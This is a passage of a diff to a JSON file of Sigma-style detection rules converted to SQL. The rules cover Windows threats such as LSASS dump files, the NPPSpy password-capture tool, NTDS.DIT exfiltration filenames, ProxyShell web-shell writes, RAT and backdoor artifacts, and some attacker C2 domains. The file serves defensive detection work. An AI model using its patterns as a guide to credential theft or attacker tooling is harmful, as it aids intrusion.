'%C:\\\\Windows\\\\system32\\\\config\\\\cy-GB\\\\Setup\\\\SKB\\\\InputMethod\\\\TupTask.dat%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\config\\\\config\\\\startwus.dat%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\ime\\\\SHARED\\\\WimBootConfigurations.ini%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\ime\\\\IMEJP\\\\WimBootConfigurations.ini%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\ime\\\\IMETC\\\\WimBootConfigurations.ini%' ESCAPE '\\')" ], - "filename": "win_appxdeployment_server_mal_appx_names.yml" + "filename": "file_event_win_cve_2021_31979_cve_2021_33771_exploits.yml" }, { - "title": "Suspicious AppX Package Locations", - "id": "5cdeaf3d-1489-477c-95ab-c318559fc051", - "status": "experimental", - "description": "Detects an appx package added the pipeline of the \"to be processed\" packages which is located in suspicious locations", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Adwind RAT / JRAT File Artifact", + "id": "0bcfabcb-7929-47f4-93d6-b33fb67d34d1", + "status": "test", + "description": "Detects javaw.exe in AppData folder as used by Adwind / JRAT", + "author": "Florian Roth (Nextron Systems), Tom Ueltschi, Jonhnathan Ribeiro, oscd.community", "tags": [ - "attack.defense_evasion" - ], - "falsepositives": [ - "Unknown" + "attack.execution", + "attack.t1059.005", + "attack.t1059.007" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppXDeploymentServer/Operational' AND EventID = '854' AND (Path LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Path LIKE '%/users/public/%' ESCAPE '\\' OR Path LIKE '%C:\\\\PerfLogs\\\\%' ESCAPE '\\' OR Path LIKE '%C:/perflogs/%' ESCAPE '\\' OR Path LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR Path LIKE '%/desktop/%' ESCAPE '\\' OR Path LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR Path LIKE '%/Downloads/%' ESCAPE '\\' OR Path LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR Path LIKE '%C:/Windows/Temp/%' ESCAPE '\\' OR Path LIKE '%\\\\AppdData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR Path LIKE '%/AppdData/Local/Temp/%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\Oracle\\\\bin\\\\java%' ESCAPE '\\' AND TargetFilename LIKE '%.exe%' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\Retrive%' ESCAPE '\\' AND TargetFilename LIKE '%.vbs%' ESCAPE '\\'))" ], - "filename": "win_appxdeployment_server_susp_package_locations.yml" + "filename": "file_event_win_mal_adwind.yml" }, { - "title": "Uncommon AppX Package Locations", - "id": "c977cb50-3dff-4a9f-b873-9290f56132f1", - "status": "experimental", - "description": "Detects an appx package added the pipeline of the \"to be processed\" packages which is located in uncommon locations", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "NPPSpy Hacktool Usage", + "id": "cad1fe90-2406-44dc-bd03-59d0b58fe722", + "status": "test", + "description": "Detects the use of NPPSpy hacktool that stores cleartext passwords of users that logged in to a local file", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.credential_access" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppXDeploymentServer/Operational' AND EventID = '854' AND NOT (((Path LIKE '%C:\\\\Program Files\\\\WindowsApps\\\\%' ESCAPE '\\' OR Path LIKE '%C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR Path LIKE '%C:\\\\Windows\\\\SystemApps\\\\%' ESCAPE '\\' OR Path LIKE '%C:\\\\Windows\\\\PrintDialog\\\\%' ESCAPE '\\' OR Path LIKE '%C:\\\\Windows\\\\ImmersiveControlPanel\\\\%' ESCAPE '\\' OR Path LIKE '%x-windowsupdate://%' ESCAPE '\\' OR Path LIKE '%file:///C:/Program\\%20Files%' ESCAPE '\\')) OR ((Path LIKE '%https://statics.teams.cdn.office.net/%' ESCAPE '\\' OR Path LIKE '%microsoft.com%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\NPPSpy.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\NPPSpy.dll' ESCAPE '\\')" ], - "filename": "win_appxdeployment_server_uncommon_package_locations.yml" + "filename": "file_event_win_hktl_nppspy.yml" }, { - "title": "WMI Persistence", - "id": "0b7889b4-5577-4521-a60a-3376ee7f9f7b", + "title": "LSASS Memory Dump File Creation", + "id": "5e3d3601-0662-4af0-b1d2-36a05e90c40a", "status": "test", - "description": "Detects suspicious WMI event filter and command line event consumer based on WMI and Security Logs.", - "author": "Florian Roth (Nextron Systems), Gleb Sukhodolskiy, Timur Zinniatullin oscd.community", + "description": "LSASS memory dump creation using operating systems utilities. Procdump will use process name in output file if no name is specified", + "author": "Teymur Kheirkhabarov, oscd.community", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1546.003" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Unknown (data set is too small; further testing needed)" + "Dumping lsass memory for forensic investigation purposes by legitimate incident responder or forensic invetigator", + "Dumps of another process that contains lsass in its process name (substring)" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (((EventID = '5861' AND (logs MATCH ('\"ActiveScriptEventConsumer\" OR \"CommandLineEventConsumer\" OR \"CommandLineTemplate\"'))) OR EventID = '5859') AND NOT (Provider = 'SCM Event Provider' AND Query LIKE 'select % from MSFT\\_SCMEventLogEvent' ESCAPE '\\' AND User = 'S-1-5-32-544' AND PossibleCause = 'Permanent'))" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%lsass%' ESCAPE '\\' AND TargetFilename LIKE '%dmp' ESCAPE '\\')" ], - "filename": "win_wmi_persistence.yml" + "filename": "file_event_win_lsass_memory_dump_file_creation.yml" }, { - "title": "Sysinternals Tools AppX Versions Execution", - "id": "d29a20b2-be4b-4827-81f2-3d8a59eab5fc", + "title": "Potential Binary Or Script Dropper Via PowerShell.EXE", + "id": "7047d730-036f-4f40-b9d8-1c63e36d5e62", "status": "experimental", - "description": "Detects execution of Sysinternals tools via an AppX package. Attackers could install the Sysinternals Suite to get access to tools such as psexec and procdump to avoid detection based on System paths", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects PowerShell creating a binary executable or script file.", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.execution" + "attack.persistence" ], "falsepositives": [ - "Legitimate usage of the applications from the Windows Store" + "Depending on your environment accepted applications may leverage this at times. It is recommended to search for anomalies inidicative of malware." ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppModel-Runtime/Admin' AND EventID = '201' AND ImageName IN ('procdump.exe', 'psloglist.exe', 'psexec.exe', 'livekd.exe', 'ADExplorer.exe'))" + "SELECT * FROM logs WHERE (((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.com' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.ocx' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.scr' ESCAPE '\\' OR TargetFilename LIKE '%.sys' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\')) AND NOT ((TargetFilename LIKE '%\\_\\_PSScriptPolicyTest\\_%' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\')))" ], - "filename": "win_appmodel_runtime_sysinternals_tools_appx_execution.yml" + "filename": "file_event_win_powershell_drop_binary.yml" }, { - "title": "CVE-2021-1675 Print Spooler Exploitation", - "id": "f34d942d-c8c4-4f1f-b196-22471aecf10a", + "title": "Suspicious MSExchangeMailboxReplication ASPX Write", + "id": "7280c9f3-a5af-45d0-916a-bc01cb4151c9", "status": "test", - "description": "Detects driver load events print service operational log that are a sign of successful exploitation attempts against print spooler vulnerability CVE-2021-1675", + "description": "Detects suspicious activity in which the MSExchangeMailboxReplication process writes .asp and .apsx files to disk, which could be a sign of ProxyShell exploitation", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1569", - "cve.2021.1675" + "attack.initial_access", + "attack.t1190", + "attack.persistence", + "attack.t1505.003" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-PrintService/Operational' AND EventID = '316' AND (logs MATCH ('\"UNIDRV.DLL, kernelbase.dll, \" OR \" 123 \" OR \" 1234 \" OR \"mimispool\"')))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\MSExchangeMailboxReplication.exe' ESCAPE '\\' AND (TargetFilename LIKE '%.aspx' ESCAPE '\\' OR TargetFilename LIKE '%.asp' ESCAPE '\\'))" ], - "filename": "win_exploit_cve_2021_1675_printspooler_operational.yml" + "filename": "file_event_win_susp_exchange_aspx_write.yml" }, { - "title": "Potential Active Directory Reconnaissance/Enumeration Via LDAP", - "id": "31d68132-4038-47c7-8f8e-635a39a7c174", - "status": "test", - "description": "Detects potential Active Directory enumeration via LDAP", - "author": "Adeem Mawani", + "title": "Office Macro File Download", + "id": "0e29e3a7-1ad8-40aa-b691-9f82ecd33d66", + "status": "experimental", + "description": "Detects the creation of a new office macro files on the systems via an application (browser, mail client).", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1069.002", - "attack.t1087.002", - "attack.t1482" + "attack.initial_access", + "attack.t1566.001" + ], + "falsepositives": [ + "Legitimate macro files downloaded from the internet", + "Legitimate macro files sent as attachments via emails" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (((EventID = '30' AND (SearchFilter LIKE '%(groupType:1.2.840.113556.1.4.803:=2147483648)%' ESCAPE '\\' OR SearchFilter LIKE '%(groupType:1.2.840.113556.1.4.803:=2147483656)%' ESCAPE '\\' OR SearchFilter LIKE '%(groupType:1.2.840.113556.1.4.803:=2147483652)%' ESCAPE '\\' OR SearchFilter LIKE '%(groupType:1.2.840.113556.1.4.803:=2147483650)%' ESCAPE '\\' OR SearchFilter LIKE '%(sAMAccountType=805306369)%' ESCAPE '\\' OR SearchFilter LIKE '%(sAMAccountType=805306368)%' ESCAPE '\\' OR SearchFilter LIKE '%(sAMAccountType=536870913)%' ESCAPE '\\' OR SearchFilter LIKE '%(sAMAccountType=536870912)%' ESCAPE '\\' OR SearchFilter LIKE '%(sAMAccountType=268435457)%' ESCAPE '\\' OR SearchFilter LIKE '%(sAMAccountType=268435456)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectCategory=groupPolicyContainer)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectCategory=organizationalUnit)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectCategory=Computer)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectCategory=nTDSDSA)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectCategory=server)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectCategory=domain)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectCategory=person)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectCategory=group)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectCategory=user)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectClass=trustedDomain)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectClass=computer)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectClass=server)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectClass=group)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectClass=user)%' ESCAPE '\\' OR SearchFilter LIKE '%(primaryGroupID=521)%' ESCAPE '\\' OR SearchFilter LIKE '%(primaryGroupID=516)%' ESCAPE '\\' OR SearchFilter LIKE '%(primaryGroupID=515)%' ESCAPE '\\' OR SearchFilter LIKE '%(primaryGroupID=512)%' ESCAPE '\\' OR SearchFilter LIKE '%Domain Admins%' ESCAPE '\\' OR SearchFilter LIKE '%objectGUID=\\*' ESCAPE '\\' OR SearchFilter LIKE '%(schemaIDGUID=\\*)%' ESCAPE '\\')) AND NOT (EventID = '30' AND (SearchFilter LIKE '%(domainSid=%)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectSid=%)%' ESCAPE '\\'))) OR (EventID = '30' AND (SearchFilter LIKE '%(userAccountControl:1.2.840.113556.1.4.803:=4194304)%' ESCAPE '\\' OR SearchFilter LIKE '%(userAccountControl:1.2.840.113556.1.4.803:=2097152)%' ESCAPE '\\' OR SearchFilter LIKE '%!(userAccountControl:1.2.840.113556.1.4.803:=1048574)%' ESCAPE '\\' OR SearchFilter LIKE '%(userAccountControl:1.2.840.113556.1.4.803:=524288)%' ESCAPE '\\' OR SearchFilter LIKE '%(userAccountControl:1.2.840.113556.1.4.803:=65536)%' ESCAPE '\\' OR SearchFilter LIKE '%(userAccountControl:1.2.840.113556.1.4.803:=8192)%' ESCAPE '\\' OR SearchFilter LIKE '%(userAccountControl:1.2.840.113556.1.4.803:=544)%' ESCAPE '\\' OR SearchFilter LIKE '%!(UserAccountControl:1.2.840.113556.1.4.803:=2)%' ESCAPE '\\' OR SearchFilter LIKE '%msDS-AllowedToActOnBehalfOfOtherIdentity%' ESCAPE '\\' OR SearchFilter LIKE '%msDS-AllowedToDelegateTo%' ESCAPE '\\' OR SearchFilter LIKE '%msDS-GroupManagedServiceAccount%' ESCAPE '\\' OR SearchFilter LIKE '%(accountExpires=9223372036854775807)%' ESCAPE '\\' OR SearchFilter LIKE '%(accountExpires=0)%' ESCAPE '\\' OR SearchFilter LIKE '%(adminCount=1)%' ESCAPE '\\' OR SearchFilter LIKE '%ms-MCS-AdmPwd%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\RuntimeBroker.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\thunderbird.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\brave.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\chrome.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\firefox.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\iexplore.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\maxthon.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\MicrosoftEdge.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msedge.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msedgewebview2.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\opera.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\safari.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\seamonkey.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\vivaldi.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\whale.exe' ESCAPE '\\') AND ((TargetFilename LIKE '%.docm' ESCAPE '\\' OR TargetFilename LIKE '%.dotm' ESCAPE '\\' OR TargetFilename LIKE '%.xlsm' ESCAPE '\\' OR TargetFilename LIKE '%.xltm' ESCAPE '\\' OR TargetFilename LIKE '%.potm' ESCAPE '\\' OR TargetFilename LIKE '%.pptm' ESCAPE '\\') OR (TargetFilename LIKE '%.docm:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.dotm:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.xlsm:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.xltm:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.potm:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.pptm:Zone%' ESCAPE '\\')))" ], - "filename": "win_ldap_recon.yml" + "filename": "file_event_win_office_macro_files_downloaded.yml" }, { - "title": "Block Load Of Revoked Driver", - "id": "9b72b82d-f1c5-4632-b589-187159bc6ec1", - "description": "Detects blocked load attempts of revoked drivers", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Publisher Attachment File Dropped In Suspicious Location", + "id": "3d2a2d59-929c-4b78-8c1a-145dfe9e07b1", "status": "experimental", + "description": "Detects creation of files with the \".pub\" extension in suspicious or uncommon locations. This could be a sign of attackers abusing Publisher documents", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1543" + "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "Legitimate usage of \".pub\" files from those locations" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-CodeIntegrity/Operational' AND EventID = '3023')" + "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\') AND TargetFilename LIKE '%.pub' ESCAPE '\\')" ], - "filename": "win_codeintegrity_revoked_driver.yml" + "filename": "file_event_win_office_publisher_files_in_susp_locations.yml" }, { - "title": "Code Integrity Attempted DLL Load", - "id": "f8931561-97f5-4c46-907f-0a4a592e47a7", - "description": "Detects attempted DLL load events that didn't meet anti-malware or Windows signing level requirements. It often means the file's signature is revoked or expired", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali", + "title": "Suspicious Screensaver Binary File Creation", + "id": "97aa2e88-555c-450d-85a6-229bcd87efb8", "status": "experimental", + "description": "Adversaries may establish persistence by executing malicious content triggered by user inactivity.\nScreensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension\n", + "author": "frack113", "tags": [ - "attack.execution" + "attack.persistence", + "attack.t1546.002" ], "falsepositives": [ - "Antivirus products" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-CodeIntegrity/Operational' AND EventID = '3033' AND NOT ((FileNameBuffer LIKE '%\\\\Program Files\\\\DTrace\\\\dtrace.dll' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' AND RequestedPolicy = '12' AND ValidatedPolicy = '1') OR (FileNameBuffer LIKE '%\\\\Windows\\\\System32\\\\DriverStore\\\\FileRepository\\\\%' ESCAPE '\\' AND FileNameBuffer LIKE '%\\\\igd10iumd64.dll' ESCAPE '\\' AND RequestedPolicy = '7' AND ValidatedPolicy = '1') OR (FileNameBuffer LIKE '%\\\\Windows\\\\System32\\\\nvspcap64.dll' ESCAPE '\\' AND (ProcessNameBuffer LIKE '%\\\\AppData\\\\Local\\\\Keybase\\\\Gui\\\\Keybase.exe' ESCAPE '\\' OR ProcessNameBuffer LIKE '%\\\\Microsoft\\\\Teams\\\\stage\\\\Teams.exe' ESCAPE '\\') AND RequestedPolicy = '8' AND ValidatedPolicy = '1') OR (FileNameBuffer LIKE '%\\\\Program Files\\\\Bonjour\\\\mdnsNSP.dll' ESCAPE '\\' AND (ProcessNameBuffer LIKE '%\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' OR ProcessNameBuffer LIKE '%\\\\Windows\\\\System32\\\\SIHClient.exe' ESCAPE '\\') AND RequestedPolicy IN ('8', '12') AND ValidatedPolicy = '1') OR (FileNameBuffer LIKE '%\\\\Microsoft Office\\\\root\\\\vfs\\\\ProgramFilesCommonX64\\\\Microsoft Shared\\\\OFFICE%' ESCAPE '\\' AND FileNameBuffer LIKE '%\\\\MSOXMLMF.DLL' ESCAPE '\\' AND RequestedPolicy = '7' AND ValidatedPolicy = '1') OR (FileNameBuffer LIKE '%\\\\Windows\\\\System32\\\\nvspcap64.dll' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\AppData\\\\Local\\\\slack\\\\app-%' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\slack.exe' ESCAPE '\\' AND RequestedPolicy = '8' AND ValidatedPolicy = '1') OR ((FileNameBuffer LIKE '%\\\\Mozilla Firefox\\\\mozavcodec.dll' ESCAPE '\\' OR FileNameBuffer LIKE '%\\\\Mozilla Firefox\\\\mozavutil.dll' ESCAPE '\\') AND ProcessNameBuffer LIKE '%\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\' AND RequestedPolicy = '8') OR ((FileNameBuffer LIKE '%\\\\Program Files\\\\Avast Software\\\\Avast\\\\aswAMSI.dll' ESCAPE '\\' OR FileNameBuffer LIKE '%\\\\Program Files (x86)\\\\Avast Software\\\\Avast\\\\aswAMSI.dll' ESCAPE '\\') AND RequestedPolicy IN ('8', '12') AND ValidatedPolicy = '1') OR ((FileNameBuffer LIKE '%\\\\stdole.dll' ESCAPE '\\' OR FileNameBuffer LIKE '%\\\\msdatasrc.dll' ESCAPE '\\' OR FileNameBuffer LIKE '%\\\\adodb.dll' ESCAPE '\\') AND ProcessNameBuffer LIKE '%\\\\mscorsvw.exe' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\Windows\\\\Microsoft.NET\\\\%' ESCAPE '\\' AND RequestedPolicy = '8' AND ValidatedPolicy = '2') OR (FileNameBuffer LIKE '%\\\\Program Files\\\\Google\\\\Drive File Stream\\\\%' ESCAPE '\\' AND FileNameBuffer LIKE '%\\\\crashpad\\_handler.exe' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\Windows\\\\ImmersiveControlPanel\\\\SystemSettings.exe' ESCAPE '\\' AND RequestedPolicy = '8' AND ValidatedPolicy = '1')))" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%.scr' ESCAPE '\\' AND NOT (((NewProcessName LIKE '%\\\\Kindle.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Bin\\\\ccSvcHst.exe' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\TiWorker.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\uwfservicingscr.scr' ESCAPE '\\')))" ], - "filename": "win_codeintegrity_attempted_dll_load.yml" + "filename": "file_event_win_creation_scr_binary_file.yml" }, { - "title": "Code Integrity Blocked Driver Load", - "id": "e4be5675-4a53-426a-8c81-a8bb2387e947", - "description": "Detects blocked load events that did not meet the authenticode signing level requirements or violated code integrity policy", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Legitimate Application Dropped Archive", + "id": "654fcc6d-840d-4844-9b07-2c3300e54a26", "status": "experimental", + "description": "Detects programs on a Windows system that should not write an archive to disk", + "author": "frack113, Florian Roth", "tags": [ - "attack.privilege_escalation", - "attack.t1543" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-CodeIntegrity/Operational' AND EventID = '3077')" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msaccess.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mspub.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\eqnedt32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\visio.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wordview.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certoc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\CertReq.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Desktopimgdownldr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\finger.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\notepad.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AcroRd32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RdrCEF.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.zip' ESCAPE '\\' OR TargetFilename LIKE '%.rar' ESCAPE '\\' OR TargetFilename LIKE '%.7z' ESCAPE '\\' OR TargetFilename LIKE '%.diagcab' ESCAPE '\\' OR TargetFilename LIKE '%.appx' ESCAPE '\\'))" ], - "filename": "win_codeintegrity_blocked_driver_load.yml" + "filename": "file_event_win_legitimate_app_dropping_archive.yml" }, { - "title": "GALLIUM Artefacts - Builtin", - "id": "3db10f25-2527-4b79-8d4b-471eb900ee29", + "title": "Pingback Backdoor File Indicators", + "id": "2bd63d53-84d4-4210-80ff-bf0658f1bf78", "status": "test", - "description": "Detects artefacts associated with activity group GALLIUM - Microsoft Threat Intelligence Center indicators released in December 2019.", - "author": "Tim Burrell", + "description": "Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report", + "author": "Bhabesh Raj", "tags": [ - "attack.credential_access", - "attack.command_and_control", - "attack.t1071" + "attack.persistence", + "attack.t1574.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '257' AND QNAME IN ('asyspy256.ddns.net', 'hotkillmail9sddcc.ddns.net', 'rosaf112.ddns.net', 'cvdfhjh1231.myftp.biz', 'sz2016rose.ddns.net', 'dffwescwer4325.myftp.biz', 'cvdfhjh1231.ddns.net'))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%updata.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Windows\\\\oci.dll' ESCAPE '\\')" ], - "filename": "win_dns_analytic_apt_gallium.yml" + "filename": "file_event_win_malware_pingback_backdoor.yml" }, { - "title": "Potential Remote Desktop Connection to Non-Domain Host", - "id": "ce5678bb-b9aa-4fb5-be4b-e57f686256ad", - "status": "test", - "description": "Detects logons using NTLM to hosts that are potentially not part of the domain.", - "author": "James Pemberton", - "tags": [ - "attack.command_and_control", - "attack.t1219" - ], + "title": "Windows Shell/Scripting Application File Write to Suspicious Folder", + "id": "1277f594-a7d1-4f28-a2d3-73af5cbeab43", + "status": "experimental", + "description": "Detects Windows shells and scripting applications that write files to suspicious folders", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Host connections to valid domains, exclude these.", - "Host connections not using host FQDN.", - "Host connections to external legitimate domains." + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Provider_Name = 'Microsoft-Windows-NTLM/Operational' AND EventID = '8001' AND TargetName LIKE 'TERMSRV%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (((NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\') AND (TargetFilename LIKE 'C:\\\\PerfLogs\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Users\\\\Public\\\\%' ESCAPE '\\')) OR ((NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\') AND (TargetFilename LIKE '%C:\\\\PerfLogs\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\')))" ], - "filename": "win_susp_ntlm_rdp.yml" + "filename": "file_event_win_shell_write_susp_directory.yml" }, { - "title": "NTLM Brute Force", - "id": "9c8acf1a-cbf9-4db6-b63c-74baabe03e59", + "title": "Suspicious NTDS Exfil Filename Patterns", + "id": "3a8da4e0-36c1-40d2-8b29-b3e890d5172a", "status": "test", - "description": "Detects common NTLM brute force device names", - "author": "Jerry Shockley '@jsh0x'", + "description": "Detects suspicious creations of files with names used in various tools that export the NTDS.DIT for exfiltration", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.credential_access", - "attack.t1110" + "attack.t1003.003" ], "falsepositives": [ - "Systems with names equal to the spoofed ones used by the brute force tools" + "Unknown" ], - "level": 